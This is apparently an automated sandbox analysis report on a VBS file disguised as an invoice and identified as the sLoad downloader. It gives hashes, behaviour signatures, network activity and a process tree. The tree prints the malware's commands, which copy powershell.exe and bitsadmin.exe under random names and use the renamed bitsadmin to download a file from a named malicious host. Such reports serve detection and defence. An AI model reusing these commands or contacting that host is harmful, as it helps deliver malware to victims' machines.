Analysis

  • max time kernel
    86s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 15:02

General

  • Target

    FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs

  • Size

    3KB

  • MD5

    ba1697038db097aae963962a1fd5dd15

  • SHA1

    46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8

  • SHA256

    79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c

  • SHA512

    d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64

Score
10/10

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369\FattDiffEmessa2020 03799870369.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
      2⤵
      PID:3484
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
      2⤵
      PID:3656
    • C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
      "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
      2⤵
      • Executes dropped EXE
      PID:1716

Network

  • DNS (flag-us)
    Remote address: 8.8.8.8:53
    Request: ndjambo.com IN A
    Response:

  • Connections

    Remote address       Domain        Proto   Bytes sent   Bytes received   Packets sent   Packets received
    104.110.191.133:80                         104 B                         2
    20.189.173.1:443                           322 B                         7
    8.253.135.120:80                           46 B         40 B             1              1
    104.110.191.133:80                         322 B                         7
    92.123.140.25:80                           322 B                         7
    8.8.8.8:53           ndjambo.com   dns     57 B         130 B            1              1

  • DNS Request

    ndjambo.com

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

    Filesize

    182KB

    MD5

    f57a03fa0e654b393bb078d1c60695f3

    SHA1

    1ced6636bd2462c0f1b64775e1981d22ae57af0b

    SHA256

    c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

    SHA512

    7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
